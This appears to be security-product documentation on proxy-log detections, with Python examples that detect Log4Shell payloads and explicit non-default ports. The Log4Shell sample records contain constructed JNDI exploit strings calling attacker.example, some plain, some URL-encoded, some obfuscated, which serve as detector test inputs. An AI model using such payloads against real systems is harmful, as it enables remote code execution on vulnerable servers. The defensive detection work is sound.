
Proxy detections

A proxy server is a system or router that acts as a gateway between users and the internet. Because the proxy sits as an intermediary, it isolates the internal network from the internet and from attackers, which helps organizations keep attacks from reaching the private network. Proxies provide a valuable layer of security in general and an important data source for analyzing web traffic going to and from your organization. Monitoring proxy data can help pinpoint attacks, reveal malicious behavior, and add context to what entities are doing within your organization. The list of out-of-the-box detections below covers commonly seen use cases for spotting potentially malicious activity in proxy logs.

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access


Alert that checks for attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message. This includes payloads carried in the URL, the User-Agent header, the Referer header, or in POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events because of the number of scanners currently probing systems on the Internet. It is therefore likely to need some tuning.

Source table → cloud.azure
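The following is an added Python example of the detection logic described above, not the product's own query. It scans the fields the alert inspects (URL, User-Agent, Referer, body) for a JNDI lookup, after undoing URL-encoding and the `${lower:}`, `${upper:}` and `${::-}` wrappers attackers used to hide the literal `jndi`. The record shape, the field names and the `ignore_sources` tuning knob are assumptions for this example; the sample records are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# Lookup wrappers used to hide the literal "jndi": ${lower:j}, ${upper:N}, ${::-j}.
# Nested braces are excluded from the capture, so one pass resolves only the innermost level.
_OBFUSCATED_LOOKUP = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]+?)\s*\}"   # ${lower:x} / ${upper:x}
    r"|\$\{\s*::-([^${}]*?)\s*\}",                    # ${::-x}
    re.IGNORECASE,
)

# Once de-obfuscated, the payload has to name the JNDI lookup and a protocol for Log4j to resolve.
_JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:",
    re.IGNORECASE,
)

# Record fields that can carry the payload, per the alert description (assumed field names).
INSPECTED_FIELDS = ("url", "user_agent", "referer", "body")


def normalize(value: str, max_rounds: int = 6) -> str:
    """URL-decode and collapse lookup wrappers repeatedly until the text stops changing."""
    current = value
    for _ in range(max_rounds):
        step = unquote(current)
        step = _OBFUSCATED_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), step
        )
        if step == current:
            break
        current = step
    return current


def find_log4shell_payload(record: dict) -> list:
    """Return (field, protocol) for every inspected field that carries a JNDI lookup."""
    hits = []
    for field in INSPECTED_FIELDS:
        match = _JNDI_LOOKUP.search(normalize(record.get(field) or ""))
        if match:
            hits.append((field, match.group(1).lower()))
    return hits


def alert_on_log4shell(records, ignore_sources=frozenset()):
    """Run the detection over a batch of proxy records.

    ignore_sources is a tuning knob assumed for this example (not a product setting): client IPs
    of authorised internal scanners whose test payloads should not raise alerts.
    """
    alerts = []
    for rec in records:
        if rec.get("client_ip") in ignore_sources:
            continue
        hits = find_log4shell_payload(rec)
        if hits:
            alerts.append({"client_ip": rec.get("client_ip"), "url": rec.get("url"), "hits": hits})
    return alerts


# Constructed sample records in an assumed proxy-access-log shape; not real traffic.
SAMPLE_RECORDS = [
    {   # plain payload in the User-Agent header
        "client_ip": "203.0.113.10", "method": "GET", "url": "/index.html",
        "user_agent": "${jndi:ldap://attacker.example/a}", "referer": "", "body": "",
    },
    {   # URL-encoded payload in the query string
        "client_ip": "203.0.113.11", "method": "GET",
        "url": "/search?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%3A1099%2Fx%7D",
        "user_agent": "Mozilla/5.0", "referer": "", "body": "",
    },
    {   # lower/upper/::- wrappers hiding "jndi" and "ldap" in a POST body
        "client_ip": "203.0.113.12", "method": "POST", "url": "/api/login",
        "user_agent": "curl/8.0", "referer": "",
        "body": "user=${${lower:j}${upper:n}${::-d}i:${lower:l}dap://attacker.example/x}",
    },
    {   # benign: a template placeholder and a path that merely contains the word jndi
        "client_ip": "10.0.0.5", "method": "GET", "url": "/docs/jndi-tutorial?tpl=${user}",
        "user_agent": "Mozilla/5.0", "referer": "https://intranet.example/", "body": "",
    },
    {   # authorised internal scanner, suppressed through the ignore_sources tuning
        "client_ip": "10.0.0.99", "method": "GET", "url": "/?x=${jndi:dns://scan.internal/t}",
        "user_agent": "internal-scanner", "referer": "", "body": "",
    },
]

if __name__ == "__main__":
    for alert in alert_on_log4shell(SAMPLE_RECORDS, ignore_sources={"10.0.0.99"}):
        print(alert)
```

Decoding and de-obfuscating before matching is what keeps the rule from being bypassed by trivially wrapped payloads, while the `ignore_sources` set illustrates the kind of tuning the warning above refers to: known scanner sources are excluded before the pattern match rather than by post-filtering the alerts.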

During the normal browsing of a user or system, URLs do not include the destination port, because the scheme implies it (80 for HTTP, 443 for HTTPS). A URL that spells out a port, especially a non-default one, can therefore indicate suspicious behavior when combined with other factors.

Source table → proxy.all.access
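The following is an added Python example of the explicit-port check described above, not the product's own query. It parses the request target of each proxy record, reports a port only when it is written out and differs from the scheme default, and records one extra factor (whether the destination is a bare IP address) of the kind the description says the port should be combined with. Two assumptions are made for the example: CONNECT requests, whose target is `host:port` rather than a full URL, are treated as HTTPS with 443 as the expected port, and the record shape and field names are invented; the sample records are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

# Ports implied by the scheme; a URL that spells one of these out is redundant but not anomalous.
SCHEME_DEFAULT_PORT = {"http": 80, "https": 443, "ftp": 21}


def parse_target(method, url):
    """Return (scheme, host, explicit_port) for a proxy request target.

    CONNECT targets are authority-form 'host:port' (assumed here to mean HTTPS). The '//' prefix
    makes urlsplit read that text as a network location instead of guessing 'host' is a scheme.
    """
    if "://" not in url:
        parts = urlsplit("//" + url)
        scheme = "https" if method.upper() == "CONNECT" else ""
    else:
        parts = urlsplit(url)
        scheme = parts.scheme.lower()
    try:
        port = parts.port  # None when no port is written; ValueError on text like ':abc'
    except ValueError:     # malformed port: leave it to a malformed-URL rule rather than guess
        port = None
    return scheme, parts.hostname, port


def host_is_ip(host):
    """True when the destination is a literal IPv4/IPv6 address rather than a hostname."""
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def nondefault_port(method, url):
    """The port explicitly written in the request and different from the scheme default, else None."""
    scheme, _host, port = parse_target(method, url)
    if port is None or port == SCHEME_DEFAULT_PORT.get(scheme):
        return None
    return port


def detect_explicit_ports(records):
    """Flag records whose target carries a non-default port, enriched with the bare-IP factor."""
    findings = []
    for rec in records:
        port = nondefault_port(rec["method"], rec["url"])
        if port is None:
            continue
        _scheme, host, _port = parse_target(rec["method"], rec["url"])
        findings.append({
            "client_ip": rec["client_ip"],
            "host": host,
            "port": port,
            "host_is_ip": host_is_ip(host),  # one extra factor that raises confidence
        })
    return findings


# Constructed sample records in an assumed proxy-access-log shape; not real traffic.
PORT_SAMPLE_RECORDS = [
    {"client_ip": "10.0.0.5", "method": "GET", "url": "https://www.example.com/index.html"},
    {"client_ip": "10.0.0.5", "method": "GET", "url": "http://www.example.com:80/"},        # explicit default
    {"client_ip": "10.0.0.7", "method": "GET", "url": "http://198.51.100.7:8080/update.bin"},
    {"client_ip": "10.0.0.8", "method": "CONNECT", "url": "mail.example.com:443"},         # normal TLS tunnel
    {"client_ip": "10.0.0.9", "method": "CONNECT", "url": "198.51.100.9:4444"},
    {"client_ip": "10.0.0.10", "method": "GET", "url": "http://[2001:db8::1]:8443/"},
    {"client_ip": "10.0.0.11", "method": "GET", "url": "http://example.com:abc/"},          # malformed port
]

if __name__ == "__main__":
    for finding in detect_explicit_ports(PORT_SAMPLE_RECORDS):
        print(finding)
```

Treating CONNECT `host:443` as normal is what keeps the rule quiet on ordinary HTTPS traffic, since every tunnelled request carries a port in its target; the remaining hits (a raw IP on 8080, a tunnel to port 4444, an IPv6 literal on 8443) are the cases worth correlating with other signals.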